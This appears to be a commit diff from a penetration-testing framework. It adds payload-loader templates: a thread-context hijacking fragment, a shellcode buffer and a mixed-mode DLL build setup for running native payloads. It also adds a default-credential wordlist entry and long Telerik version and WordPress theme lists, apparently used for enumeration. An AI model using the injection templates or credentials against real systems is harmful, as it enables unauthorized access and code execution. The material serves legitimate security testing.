ctx.Eip = (DWORD)ep;
#endif
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread,&ctx);
SetThreadContext(pi.hThread,&ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
}
// ExitProcess(0);
ExitThread(0);
ExitThread(0);
}
/*
typedef VOID
(NTAPI *PIMAGE_TLS_CALLBACK) (
PVOID DllHandle,
ULONG Reason,
PVOID Reserved
);
VOID NTAPI TlsCallback(
IN PVOID DllHandle,
IN ULONG Reason,
IN PVOID Reserved)
{
__asm ( "int3" );
}
ULONG _tls_index;
PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
*/
-3
View File
@@ -1,3 +0,0 @@
EXPORTS
DllMain@12
+3 -2
View File
@@ -1,4 +1,5 @@
#define SCSIZE 2048
#define SCSIZE 4096
unsigned char code[SCSIZE] = "PAYLOAD:";
char szSyncNameS[MAX_PATH] = "Local\\Semaphore:Default\0";
char szSyncNameE[MAX_PATH] = "Local\\Event:Default\0";
View File
@@ -0,0 +1,23 @@
# DLL Mixed Mode
This is a [Mixed Mode Assembly][1], it allows a native payload from Metasploit
to be executed from within what is the bare minimum requirements of a valid .NET
assembly. The DLL source code is the same as the [standard DLL][2] template, the
primary difference from a file perspective is that this DLL has the necessary
manifest information to be loaded as a managed assembly.
## Building
Use the provided `build.bat` file, and run it from within the Visual Studio
developer console. The batch file requires that the `%VCINSTALLDIR%` environment
variable be defined (which it should be by default). The build script will
create both the x86 and x64 templates before moving them into the correct
folder. The current working directory when the build is run must be the source
code directory (`dll_mixed_mode`).
## References
* https://github.com/bao7uo/MixedUp
* https://thewover.github.io/Mixed-Assemblies/
[1]: https://docs.microsoft.com/en-us/cpp/dotnet/mixed-native-and-managed-assemblies?view=vs-2019
[2]: https://github.com/rapid7/metasploit-framework/tree/master/data/templates/src/pe/dlli
@@ -0,0 +1,13 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj
move *.dll ..\..\..
@@ -0,0 +1,2 @@
#pragma unmanaged
#include "template.c"
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1
View File
@@ -505,3 +505,4 @@ wradmin trancell
write private
xd xd
xxx cascade
zyfwp PrOw!aN_fXp
@@ -0,0 +1,100 @@
# last updated 2020-10-07
# see: https://www.telerik.com/support/whats-new/aspnet-ajax/release-history
2020.3.915
2020.2.617
2020.2.512
2020.1.219
2020.1.114
2019.3.1023
2019.3.917
2019.2.514
2019.1.215
2019.1.115
2018.3.910
2018.2.710
2018.2.516
2018.1.117
2015.2.623
2014.1.403
2017.3.913
2017.2.711
2017.2.621
2017.2.503
2017.1.228
2017.1.118
2016.3.1027
2016.3.1018
2016.3.914
2016.2.607
2016.2.504
2016.1.225
2016.1.113
2015.3.1111
2015.3.930
2015.2.826
2015.2.729
2015.2.604
2015.1.225
2015.1.204
2014.3.1024
2014.2.724
2014.2.618
2014.1.225
2013.3.1324
2013.3.1114
2013.3.1015
2013.2.717
2013.2.611
2013.1.417
2013.1.403
2013.1.220
2012.3.1308
2012.3.1205
2012.3.1016
2012.2.912
2012.2.724
2012.2.607
2012.1.411
2012.1.215
2011.3.1305
2011.31115
2011.2915
2011.2712
2011.1519
2011.1413
2011.1315
2010.31317
2010.31215
2010.31109
2010.2929
2010.2826
2010.2713
2010.1519
2010.1415
2010.1309
2009.31314
2009.31208
2009.31103
2009.2826
2009.2701
2009.1527
2009.1402
2009.1311
2008.31314
2008.31125
2008.31105
2008.21001
2008.2826
2008.2723
2008.1619
2008.1515
2008.1415
2007.31425
2007.31314
2007.31218
2007.21107
2007.21010
2007.2918
2007.1626
2007.1521
2007.1423
+8987 -1602
View File
File diff suppressed because it is too large Load Diff
+1923
View File
@@ -20,6 +20,7 @@
1976
1beauty-studio
1blogto
1io
1n07070
1skyliner
1sr_first
@@ -90,6 +91,7 @@
8bit
8press
8q
8rise
8some
8squares
8templates_city_green
@@ -123,7 +125,9 @@ a-delicious-red
a-different-blue
a-dream-to-host
a-dream-within
a-gridblog
a-kelleyroo-halloween
a-little-bit-of-doodle
a-little-touch-of-purple
a-magazine
a-new
@@ -147,16 +151,20 @@ a11yall
a19
a5
aaa
aaaaaaaa
aaddeel
aadi
aadya
aagaz-startup
aak
aakanksha-unique
aakriti-personal-blog
aakrosh
aamla
aanews
aapna
aargee
aari
aaron
aaron-modified-intent
aav1
@@ -176,6 +184,7 @@ abcmn
abcok
abedul
abel-one
abel_rad_theme
aberdeen
aberration-lite
abheektheme-uri-httpcolorlib-comwpthemessparkling
@@ -183,9 +192,11 @@ abi-jackson
abik
ability
abingle
abiolian-business
abisteel
abitno
able
abletone
ablog
abnomize
about-me
@@ -218,6 +229,7 @@ ac-repair
academic
academic-clear
academic-education
academic-education1
academic-hub
academic-lite
academic1
@@ -269,28 +281,35 @@ ace-corporate
ace-theme
acer
acer-theme
aces
achilles-blog
achillestheme
aciago
acid-rain
acitpo
acme
acme-wp
acmeblog
acmephoto
acmetech
acms
acommerce
acool
acosminblogger
acoustics
act-child
act-theme-lite
actify
actinia
action
actions
activatelife
activation
active-pro
active-red
active-theme
activeblog-lite
activell
activello
activello-1
activello-2-0theme-uri-httpscolorlib-comwpthemesactivello
@@ -323,6 +342,7 @@ adam
adamite
adamos
adams-razor
adaptable-notes
adaptativo
adapter
adaption
@@ -339,8 +359,10 @@ adena
adept
adeq
adformat
adguru
adirondack
adisaly
aditi
adle
adler
adm
@@ -354,6 +376,7 @@ admired
admize
adney
adonis
adorable-blog
adoration
adri
adrian-lite
@@ -384,8 +407,10 @@ advance-portfolio
advance-portfolio-0-1
advance-simple-blue
advance-startup
advance1-fitness-gym
advantage
advent
adventeqa
adventura
adventure
adventure-blog
@@ -393,6 +418,7 @@ adventure-bound-basic
adventure-journal
adventure-journal-21
adventure-lite
adventure-soul
adventure-tours
adventure-travel
adventure-travelling
@@ -408,13 +434,16 @@ aeby-events-seo-writers-blogily
aedificator
aedificator-1-0-10
aemi
aemi-child
aemon
aeonaccess
aeonblog
aereo
aerial
aerin
aero
aero-inspirat
aerobics
aeroblog
aeros
aerosmanish
@@ -426,7 +455,10 @@ aestival
afeeee
affidavit
affiliate-blog-writer
affiliate-marketingly
affiliate-newspaperly
affiliateblogwriter
affiliates-bloglet
affilicious-theme
affilistrap
affilivice
@@ -447,15 +479,23 @@ agama-blue
agama-blue-2-0
agel-web
agena
agence
agency
agency-4
agency-ecommerce
agency-elentra
agency-lite
agency-maker
agency-plus
agency-starter
agency-x
agency-zita
agencyup
agensy
aggiornare
agile-spirit
agilith
agility-wp
agindo
agiva
aglee-lite
@@ -474,6 +514,7 @@ aible
aif
aikon-academy
aileron
aino
aionwars
air
air-balloon-lite
@@ -481,10 +522,12 @@ air-free
air-light
airey
airi
airi-patricia
airi1
airiteste
airiwachswachs
airmail-par-avion
airnews
airship
airy
ais-theme
@@ -494,26 +537,32 @@ aj
ajaira
ajaytheme
ajna-yoga
ak-blogs
ak-newsdesk-lite
akaka
akakaa
akangatu
akarsh-blog
akash
akasse
akella
akhada-fitness-gym
aki-blog
akihabara
akira
akks
akpager
aktivitetisormland
akyl
akyra
akyra1
akysz-e-commerce
akyuz
akyuz-theme
al-washahi-theme
alacrity-lite
aladdin
alagu
alamein
alanding-lite
alante
@@ -528,6 +577,7 @@ alante-engage
alante-green
alante-grid
alante-magazine
alante-minimal
alante-news
alante-orange
alante-shop
@@ -540,16 +590,20 @@ alba
alba-lite
alba-tumblog
albar
albatross
albinomouse
albizia
alce
alchem
alchemist
aldehyde
alderbrook
aldus
aleanta
aleksandr
alemtech
alemtech01
alera
alert1
aletheia
alewitryna-maggy
@@ -566,6 +620,7 @@ alexlaura
alexradar
alexradarauthor-sachin-khanna
alfa
alfredo
algarve-golf
algarve_golf
alger
@@ -590,6 +645,7 @@ align
alii-xtreme
aliraza
alishba
alisoair
alison-tang-design
alithedevelopertemplate
alizee
@@ -598,6 +654,7 @@ alkane
alkimia
alkivia-chameleon
alku
all-colors
all-green
all-orange
all-purpose
@@ -612,11 +669,14 @@ allblog
allegiant
allegiant-2
allegiant1
allegiantly
alleria
allied-uri-httpflytunes-fmthemesaries
allingrid
allingrid111
allinonelight
allium
allium103
allmed
allo
allrounder-news
@@ -628,6 +688,7 @@ allure-real-estate-theme-for-real-estate-pro
allurer
alluring-ecommerce
ally-morning-wordpress
almaira-shop
almanac
almasi
almia
@@ -647,6 +708,7 @@ alowa
alpen
alpen3col
alpha
alpha-blog
alpha-centauri
alpha-forte
alpha-lite
@@ -660,6 +722,7 @@ alpha-trinity
alphaactivity
alphabet
alphabet-theme
alphablog
alphas-manifesto
alphastrap
alphatr
@@ -683,14 +746,17 @@ altis-simple
altitude-free
altitude-lite
altitudelite
altminimo
altofocus
alum
alvaro-uri-httpsthemepalace-comdownloadstravel-ultimate
alvn-pizza
always-twittingtwitter-themeat4us
alyena
alyssas-blog
alétheia
am-striped
amaaaze
amadeo-free
amadeus
amadeus1
@@ -698,7 +764,10 @@ amalia
amalie
amalie-lite
amanda-lite
amandaasalcedotriano
amandacasey-default-theme
amandalite
amani
amaranthine
amaryllo
amateur
@@ -711,8 +780,12 @@ amazing-blog
amazing-grace
amazing-grace2
amazona
amazonrise
amazorize
amazorize-v1
ambergreen
ambiguity
ambika
ambirurmxd
ambision
ambition
@@ -726,12 +799,14 @@ americana
amerifecta
amethyst
ametro
ameya
amez
ami-tuxedo
amiable
amidst-sky
amiga-blanca
amigo
amike-lite
aminulauthor-siteorigin
amionyaa21
amiran98
@@ -749,14 +824,19 @@ amp-accelerated-mobile-pages
amp-publisher
ampbase
ampface
ampface-base
amphibious
amphion-lite
amphitheatre
ample
ample-blog
ample-business
ample-construction
ample-magazine
amplest
amplify
amplight
amplitude
ampwp
amstel
amv-pink
@@ -778,6 +858,7 @@ analogous
analytica
analytical-lite
anand
ananya
anarcho-notepad
anassar
anatomy-lite
@@ -817,16 +898,20 @@ angularity
ani-heaven
ani-world
aniki
anila
anima
animals
animass
animate-lite
animated-site
anime
anime-crowds
anime-days
anime-desu
anime-heaven
anime-template-theme
animepress
aniro-hotel-light
anissa
anissa2
anjing
@@ -839,6 +924,7 @@ annapurna
annarita
annatheme-uri-httpscolorlib-comwpthemesactivello
annexation
annie
annina
annina-with-transparent
annotum-base
@@ -854,6 +940,7 @@ ans
ansia
ant-green
ant-magazine
anther
antheros
anti-flash-white
antiaris
@@ -864,6 +951,7 @@ antis-lemon-lime
antisnews
antondachauer
antonine
antreas
anvil
anvil-theme
anvys
@@ -884,6 +972,7 @@ aperture-2
aperture-portfolio
aperture-real-estate
apex
apex-business
aphollo
aphrodite
apik
@@ -898,11 +987,13 @@ apollo-by-gravityux
apollo-hotel
apollo-segundo
apollo-tyres
apollolabolly
apostrophe
apothecary
app-landing-page
app7
appcloud
appdetail
appeal
appgate
apple
@@ -915,8 +1006,11 @@ applex
appliance
application
applicator
appmela
appointment
appointment-blue
appointment-booking
appointment-dark
appointment-green
appointment-lite
appointment-red
@@ -953,20 +1047,25 @@ ar-theme
ar-web-studio
ar-zine
ara
arado
araiz
arancia
aranovo
aranovo2
arash
arav
aravan
arb-blogging
arba
arbitragex
arbune
arbutus
arcade-basic
arcade-basic-loff
arcade-by-frelocaters
arcana
arcanum
arcegator
arche
archie
archimedes
@@ -993,6 +1092,7 @@ arenabiz
ares
arete
areview
areview7
argent
argonia
ari
@@ -1002,8 +1102,13 @@ ariboom
aricop
aridum
ariel
ariele-lite
aries
ariftheme
arilewp
arima
arimolite
arina
ariniom
aripop
arise
@@ -1014,6 +1119,7 @@ arjuna
arjuna-x
arkade-sec
arke
arkhe
arkt
arktheme
armada
@@ -1023,11 +1129,15 @@ armenia
aromafashion
aromatry
aron
aronia
arora
arouse
arowana
arras
arras-theme
arrival
arrival-me
arrival-store
ars-cv
arsenaloide
art-blogazine
@@ -1050,7 +1160,10 @@ arthemix-bronze
arthemix-green
article
article-info
article-lite
article-world
articled
articlepress
artificial-intelligence
artikler
artikler-theme
@@ -1065,6 +1178,7 @@ artists
artists-portfolio
artix
artmag
artpop
artriaglobal
arts-style
artsavius-blog
@@ -1078,10 +1192,13 @@ arun
arunachala
aruz
arwebstudio
arwen
arya-multipurpose
aryx
arzine
asad-rai
asagi
asana
asante
asby
ascend
@@ -1109,6 +1226,7 @@ ash12
asha
ashdbajshdgashgvd
ashe
ashe1
ashe2
ashea
ashee
@@ -1125,10 +1243,12 @@ aspen
aspiration-i
aspire
aspire-lite
aspro
asr
assazag
assembly-bloc
assignment
associationx
assumedica
astapor-lite
aster
@@ -1136,11 +1256,14 @@ asteria-lite
asteria-lite2
asterion
asteroid
asthir
astn
astoned
astore
astori
astra
astra-brixco-frd
astral
astrasimo
astrid
astrid-child
@@ -1150,6 +1273,7 @@ astridd
astrologer
astrology
astronomy
astroride
asura
asusena
asycom
@@ -1157,6 +1281,7 @@ at-business
atahualpa
atahualpa-nederlandse-versie
atannas
atavist
atento
athena
athena-1-0-8
@@ -1166,8 +1291,10 @@ athenad
athenea
atheros
athlete
athlonx
atiframe-builder
atlanta
atlantaa
atlantic
atlas
atlas-concern
@@ -1191,6 +1318,7 @@ atoz
atoz-movies
atracium
atreus
attesa
attirant
attire
attitude
@@ -1207,7 +1335,9 @@ auberge1
aubogasta
auckland
auction
auction-free
auctionbb
auctions
auctor
audacity-of-tanish
audictive-ten
@@ -1245,6 +1375,7 @@ authorize
authors-notepad
autmunport
autmunport-1-1
auto-car
auto-d
auto-dealer
auto-dezmembrari
@@ -1279,7 +1410,9 @@ autumn-leaves
autumn-responsive
autumn-season
autumnnow
avad
avada
avadar
avak-fitness
avalanche
avalanche-material
@@ -1305,7 +1438,10 @@ avenue-k9-buddypress-buddypack
avery-lite
aviana-blog
aviator
avid-fashion
avid-fitness
avid-magazine
avid-travel
avien-light
avik
avior
@@ -1321,11 +1457,13 @@ avogue
avon
avon-lite
avril
avrilly
avrora
avum
avventura-lite
avvocato
avyay
aw-plus-awesome-blog
awa
awad
awada
@@ -1358,7 +1496,9 @@ awss
axflat-lite
axio-free
axio-lite
axiohost
axiom
axis-magazine
aya
ayaairport
ayabiostorelite
@@ -1379,6 +1519,7 @@ ayaportfolio
ayapsychology
ayaspirit
ayawild
aydinmu
aye-bruh-man-look
aye-carumba
ayumi
@@ -1392,6 +1533,7 @@ azad-travel-agency
azalea
azalea-pro
azauthority
azecon
azeen
azen
azenalist
@@ -1404,13 +1546,16 @@ azexo
azonbooster
azpismis
aztech-futurethnic
aztecs
azul
azul-silver
azulejo-portugais
azuma
azure-basic
azure-minimalist-blue
azurelo-free-version
azurite
azwa
b-a-r
b-g
b-side
@@ -1420,6 +1565,7 @@ b2b
b3
b4
ba-black-tube
ba-hotel-light
ba-tours-light
babailan
babaturan
@@ -1434,6 +1580,7 @@ baby-crush
baby-sweettooth
babycare
babylog
babysitter-lite
back-my-book
back-to-basic
back-to-school
@@ -1448,6 +1595,7 @@ bad-mojo
badeyes
badeyes-twenty-fourteen-child
badjohnny
baena
bagility
bahama
bakedwp
@@ -1455,6 +1603,7 @@ bakerblues
bakeroner
bakers-lite
bakery
bakery-food
bakery-shop
bakes
bakes-and-cakes
@@ -1467,17 +1616,22 @@ balloonsongreen
ballyhoo
baltic
baltimore-phototheme
bam
bananaphie
band-portfolio
bandana
bandctheme-uri-httpqerrapress-combandc-theme
bands
bandtheme
bangasd
bangkok1
bangladesh
banheiros-quimicos
bani
banquet-hall
banten-it
baobab
bappi
bappy
bar-bistro
bar-restaurant
@@ -1493,6 +1647,7 @@ bare
bare-black
barebrick
baris
bariskkk
barista
barletta
barom
@@ -1583,8 +1738,10 @@ bc-shop
bc-shoppp
bcblog
bcenigraf
bcf-shop
bcorp-basics
bcorporate
bd-films-info
bdseventyone
be-berlin
be-my-guest
@@ -1624,10 +1781,13 @@ beauty-dots
beauty-is-beauty
beauty-land
beauty-light
beauty-mart
beauty-mountain
beauty-parlour
beauty-saloon
beauty-spa
beauty-studio
beauty-studio-pro
beauty-theme
beauty_saloon
beautyful-one
@@ -1636,6 +1796,7 @@ beautylusts7
beautymatters
beautysalon
beautyspa
beautystore
beautytemple
bebolanding
bebostore
@@ -1649,11 +1810,13 @@ beetheme
beetle
beevent
beezness
beflex
befreiphone
beginner
beginnings
begonia
begonia-lite
begro
behold
beige_elegance
beigy-wood
@@ -1672,6 +1835,7 @@ belise-lite2
bella
bella-bena
bellabena
bellablog
belle
bellesseremdl
belleza
@@ -1692,16 +1856,20 @@ benimini
benjamin
benny
benny-theme
benpress
benstheme
bento
bento555423345
benzer
benzile
beo-lite
beonepage
beonepage-lite
beoreo-shared-by-vestathemes-com
bepopshop-theme
bere-elegant
bergenwp
beri_cafe
bering
berkeley
berkky
@@ -1710,6 +1878,7 @@ berna
bernadetta
bersallis
beryl
beshop
best
best-blog
best-business
@@ -1722,6 +1891,7 @@ best-design-corporate-website
best-ecommerce
best-education
best-food
best-hotel
best-learner
best-magazine
best-minimalist
@@ -1781,10 +1951,12 @@ bicbb
bicubic
bicycle
biddo
bidhantech
bidnis
big-bang
big-blank-responsive-theme
big-blue
big-bob
big-brother
big-buttons
big-city
@@ -1804,6 +1976,7 @@ bigrecipe
bigred
bigseo-theme-lite
bigstore
bigwigs
bijinepalli
bikaner
bikaro
@@ -1825,6 +1998,7 @@ binary-stylo
binder
binfinite
binge
bingle
binner
biodun
biogenic
@@ -1851,9 +2025,11 @@ birva
birva-responsive-multipurpose-one-page-wordpress-theme
biscayalite
bisconne
biscore
biscuit-lite
bisfood-lite
bisnezia-free
bisonno
bisou
bistic
bistro
@@ -1862,21 +2038,31 @@ bitcoinee
bitlumen
bito
bits
bitstream
bitter-sweet
bitvolution
bitvolution-theme
bitwallet
biz-ezone
biz-menia
biz-news
biz-wiz
bizantine
bizark
bizart
bizberg
bizberg-consulting-dark
bizblack
bizblue
bizbuzz
bizcapita
bizcare
bizcent
bizconsulting
bizcorp
bizdir
bizflare
bizflow
bizfolio
bizgrowth
bizgrowth2
@@ -1884,6 +2070,7 @@ bizhunt
bizin
bizkit
bizlight
bizline
bizlite
bizlite-business
bizmark
@@ -1909,6 +2096,7 @@ bizstudio-lite-demo
biztheme
biztime
bizto
biztrix
biztt
bizvektor
bizvektor-global-edition
@@ -1919,12 +2107,15 @@ bizwhoop
bizwhoop1
bizwide
bizworx
bizz-builder
bizz-trip
bizzbee
bizzboss
bizzer
bizzmo
bizznik
bizznis
bizzoy
bizzy
bkk-theme
bl-flower
@@ -2029,6 +2220,8 @@ blackwell
blackwhite
blackwhite-lite
blackwhitepoetry
blackwidow
blackwidowtheme-uri-httpsthemegrill-comthemescolormag
blackwooden
blacky
blacky-right-sidebar
@@ -2070,6 +2263,7 @@ blesk
blex
blibli
blight
blight-light-blog
blind
bliss
blissful
@@ -2079,6 +2273,7 @@ bloc99
blocade
blocal
block
block-based-bosco
block-lite
blockchain-lite
blocked
@@ -2087,23 +2282,32 @@ blocks
blocks-v1-3
blocks2
blocksy
blockz
blocomo
blocomo-theme
blocomotwo
blog
blog-64
blog-aarambha
blog-and-blog
blog-and-blog-sultan
blog-bank
blog-bank-classic
blog-bank-lite
blog-belt
blog-bogo
blog-builderly
blog-building
blog-business
blog-básico
blog-circle
blog-creative
blog-curvo
blog-cycle
blog-design-lite
blog-design-studio-newblue
blog-diary
blog-edge
blog-elite
blog-era
blog-era-plus
@@ -2113,16 +2317,20 @@ blog-fever
blog-first
blog-gird
blog-grid
blog-guten
blog-gutener
blog-happens
blog-in-big-city
blog-info
blog-inn
blog-inn-pb
blog-it
blog-kit
blog-layout
blog-leptir
blog-lite
blog-lover
blog-mag
blog-magazine
blog-mantra
blog-mash
@@ -2130,6 +2338,7 @@ blog-master
blog-material
blog-minimalistas
blog-monstor
blog-nano
blog-new
blog-one
blog-one-by-michael-f
@@ -2138,15 +2347,19 @@ blog-page
blog-path
blog-personal
blog-personal-plus
blog-prime
blog-producer-coolblue
blog-rider
blog-star
blog-start
blog-starter
blog-station
blog-theme
blog-times
blog-vlog
blog-warrior-theme
blog-way
blog-web
blog-writer
blog-writing
blog-zone
@@ -2154,6 +2367,8 @@ blog-zone-update
blog0sphere
blog2019
blog64
blog99
blog_and_blog-sultan
bloga
blogaholic-blue
blogaki
@@ -2165,15 +2380,21 @@ blogasm-boxed
blogatize-blue-10-wordpress-theme
blogazine
blogazine_wct
blogband
blogbee
blogbell
blogberg
blogberry
blogbits
blogbook
blogbox
blogbuzz
blogcafe
blogcentral
blogdot
bloge
blogeasy
blogen
bloger
blogera
blogery
@@ -2185,8 +2406,10 @@ blogga
bloggable
bloggdesigns3
blogged
bloggem
blogger
blogger-base
blogger-buzz
blogger-choice
blogger-era
blogger-era-plus
@@ -2200,6 +2423,7 @@ bloggermom
bloggernation
bloggerpad
bloggers-lite
bloggers-magazinely
bloggerz
blogghiamo
blogging-pro-magazine
@@ -2211,15 +2435,19 @@ bloggingluv
bloggingprow7b
bloggist
bloggito
blogglo
bloggnorge-a1
bloggo
bloggr1-0
bloggrid
bloggster
bloggy
bloggy-fourteen
bloggy-grass
bloggy-v-2-child-theme
bloghut
blogi
blogiee
blogified
blogify
blogim
@@ -2233,6 +2461,7 @@ blogista
blogists
blogitad
blogito
blogjr
blogkori
bloglane
blogline
@@ -2242,17 +2471,22 @@ blogmagazine
blogmaster
blogme
blogmedia
blogmelody
blogmoda
blogmor
blognote
blognowlite
blogo
blogoholic
blogolife
blogoloution-1-0
blogora
blogos
blogostrap
blogotron
blogpal
blogpark
blogpecos
blogpedia
blogpost-lite
blogposts-uri-httpwww-forcabe-pt
@@ -2264,12 +2498,15 @@ blograzzi
blogrid
blogrock-core
blogrow
blogshining
blogshop
blogside
blogsimplified
blogsimplified-blackneon
blogsimplified-three-column-adsense10
blogsixteen
blogslog
blogslog-pro
blogsonry
blogspreneur-themes
blogspring-theme
@@ -2282,10 +2519,13 @@ blogster-utility
blogstrap
blogstyle
blogtay
blogtime
blogtina
blogto
blogtour
blogtxt
blogup
bloguten
blogwave
blogwise
blogwp
@@ -2294,13 +2534,18 @@ blogxplus
blogy
blogyard
blogyyy
blogz
blogzen
blogzilla
blogzine
blogzy
blokeish-aries
blood-red-flower
bloody-mary
bloog-lite
bloogs
bloom-feminine
bloomtheme
bloomy
blooster
blorigan
@@ -2318,11 +2563,15 @@ blossom-feminine
blossom-health-coach
blossom-mommy-blog
blossom-pin
blossom-pinit
blossom-pinthis
blossom-pretty
blossom-recipe
blossom-shop
blossom-spa
blossom-speaker
blossom-travel
blossom-wedding
blover
blover2019
blox
@@ -2484,6 +2733,7 @@ bluejay
bluelights
bluelime-media-basic-responsive-version
blueline
bluelink
bluem
bluemag
bluemansion
@@ -2534,6 +2784,7 @@ bluniverse
blunk
blush
bluvoox
bm-hope
bmag
bnetinvest
board-blocks
@@ -2568,10 +2819,13 @@ bold-blog
bold-blogger
bold-headline
bold-life
bold-photography
bold-photography-pro
bolder
boldly-go-blue
boldly-go-green
boldr-lite
boldwp
boleh
boloday
bolser-marine
@@ -2583,20 +2837,25 @@ bon-voyage
bonappetit
bondedsingles
bone
bonee
bones7456
bongo
bonkers
bonny
bonsai-blog
bonyo
book
book-inspiration
book-land
book-landing-page
book-lite
book-rev-lite
bookburner
bookkeeping
bookkeeping-free
bookmark
boonik
boost-biz
boost_me
booster
boot-store
@@ -2625,6 +2884,7 @@ bootstrap-beauty
bootstrap-blank
bootstrap-blog
bootstrap-canvas-wp
bootstrap-component-blox
bootstrap-essentials
bootstrap-four
bootstrap-journal
@@ -2633,6 +2893,7 @@ bootstrap-magazine
bootstrap-news
bootstrap-on
bootstrap-photo
bootstrap-photography
bootstrap-responsive-ecommerce
bootstrap-starter-canvas
bootstrap-starter-template
@@ -2657,6 +2918,7 @@ bornholm
bornoux-theme
boron
borrowed-cr
bosa
bosco
bose
boshki-portfolio
@@ -2677,6 +2939,7 @@ boutique2-222
box
box-of-boom
boxblog
boxcard
boxed-wp
boxed-zebra
boxed-zebra-theme
@@ -2709,6 +2972,7 @@ brandi
brandmix
brandnew-folio
brasserie
bravada
bravado
bravo
bravo99
@@ -2741,6 +3005,7 @@ bric-energy
brick-and-mason
bricks
brickyard
bridal
bridge
brief
bright-ideas
@@ -2753,19 +3018,25 @@ brightness-theme
brightnews
brighto
brightpage
brightpress
brightsky
brightwizard
brigsby
brigsby-by
briks
brikshya-portfolio
brill
brilliance
brilliant
brillo
brimstone
bring-back
brisk
brisko
britt
brittaboard
brittany-light
brittominimal
brix-portfolio
brluestreet
broad
@@ -2777,6 +3048,8 @@ broken-hero-uri-httptestbase-infocthemewpascent
bromine
bron
brood
brooklyn-lite
brosil
brother-mega-mart
brovy
brown
@@ -2802,10 +3075,12 @@ brunelleschi
brushed
brushedmetal
brussels
bs-blog
bs3-mobile-first
bsimple
bstone
bstv2
bsun4
btemplatr
btheme
bubble-gum
@@ -2835,6 +3110,7 @@ buddypress-widget-theme-5-widget-columns
buddypress-widgetized-home-4-group
buddypress-x-facebook
buddytheme
buddyx
bude-rocks-theme
budzmodo
bueno
@@ -2847,13 +3123,16 @@ bugency
build
build-lite
build-the-house
buildcon-lite
builder
builder-india
builder-lite
builderio
builders
builders-landing-page
building
building-blocks
building-construction-architecture
building-lite
buildings
buildingtheworld
@@ -2874,12 +3153,15 @@ bulk-shop
bulk1234
bulkandy-blog
bulletin-board
bulletin-news
bulletproof-right
bulmify
bumba
bumbeelbee
bundler
bunker
bunny
bunnypresslite
buntu
burbot
burg
@@ -2891,6 +3173,9 @@ burning-bush
burrs-inc
bushra-anwar
bushwick
busicorp
busify
busihub
busimax
business
business-a
@@ -2898,6 +3183,7 @@ business-a-spa
business-a1
business-agency
business-aid
business-blocks
business-blog
business-blog-template
business-blogger
@@ -2909,6 +3195,7 @@ business-builder
business-buzz
business-car
business-card
business-care
business-cast
business-casual
business-casual-portfolio
@@ -2917,23 +3204,31 @@ business-center-pro
business-champ
business-channels
business-child
business-class
business-click
business-club
business-construction
business-consult
business-consultancy
business-consultant
business-consultant-finder
business-consultr
business-contra
business-corner
business-corporate
business-corporate-gravity
business-cover-lite
business-craft
business-craft-good
business-cube
business-curve
business-demo
business-dew
business-directory
business-ecommerce
business-eight
business-eight1
business-elentra
business-eleven
business-elite
business-elite2_background-change
@@ -2941,6 +3236,7 @@ business-elitedap
business-epic
business-epico
business-era
business-event
business-express
business-eye
business-eye1
@@ -2949,6 +3245,7 @@ business-ezone
business-field
business-flick
business-flick-theme
business-form
business-from-henri-van-de-munt
business-gravity
business-green
@@ -2968,9 +3265,11 @@ business-kid
business-kid-testing
business-kit
business-land
business-lander
business-leader
business-lite
business-lite-4
business-magna
business-maker
business-mart
business-max
@@ -2995,23 +3294,35 @@ business-plus
business-plus-theme
business-point
business-portfolio
business-power
business-press
business-pride
business-prima
business-prime
business-pro
business-process
business-profile
business-responsive
business-responsiveness
business-roy
business-shop
business-shuffle
business-solution
business-space
business-square
business-stack
business-standard
business-starter
business-startup
business-store
business-street
business-style
business-theme
business-times
business-trade
business-trust
business-turnkey
business-uncode
business-vision
business-way
business-way-lite
@@ -3019,11 +3330,14 @@ business-woman-top
business-world
business-wp
business-x
business-zita
business-zone
business_blog
businessbiz
businessblog
businessblogs
businessbuilder
businessdeal
businessdex
businessfirst
businessfree
@@ -3034,11 +3348,13 @@ businessly
businessman-pro
businessmax
businesso
businesso-construction
businesso-dark
businesso-teal
businesspersonal
businesspress
businessprofree
businesstar
businessup
businessweb-plus
businessx
@@ -3058,10 +3374,15 @@ businessxpr
businex
businex-corporate
busiplus
busipress
busiprof
busis
busiup
busiway
buso-lightning
bussiness-bootstrap-by-ifour-technolab
bussiness-complete-finance-accounting
busyness
butcher-block
butter-scotch
butterbelly
@@ -3079,6 +3400,7 @@ buziness
buzmag
buzstores
buzz
buzz-agency
buzz-ecommerce
buzz-ecommerce11
buzz-theme
@@ -3114,14 +3436,23 @@ byzantium
byzero
bz-multisatilet
c
c4sp3r
c9-starter
c9-togo
c9-work
ca-painting
cactus
caelum
cafe
cafe-bistro
cafe-blog
cafe-business
cafe-coffee-shop
cafe-express
cafe-faucher
cafe-one
cafe-restaurant
cafeteria-lite
cafeterrace
caffeine
cai-hop-cua-toi
@@ -3135,6 +3466,8 @@ call-power
callas
callcenter
calleiro
callie
calliope
callisto
calm
calorii
@@ -3168,6 +3501,7 @@ candle-blog-theme
candour
cannyon
canoe
canon-hash
canonical
canopus
canuck
@@ -3186,9 +3520,11 @@ capricorn
capricorn55
captly-sunset
capture
capture-lite
car-blog
car-dealer
car-fix-lite
car-rent
car-show
car-tuning
car-vintage
@@ -3209,6 +3545,8 @@ cardealer
cardio
care-you
career
career-portfolio
careerpress
caresland-lite
careta
cargoex
@@ -3237,6 +3575,7 @@ casasdoforneiro
cascade
cash-music
cashier
casino-blog
casino-red-theme
casino-x
casper
@@ -3261,16 +3600,22 @@ catch-everest
catch-evolution
catch-flames
catch-foodmania
catch-foodmania-2-1
catch-fullscreen
catch-inspire
catch-kathmandu
catch-mag
catch-responsive
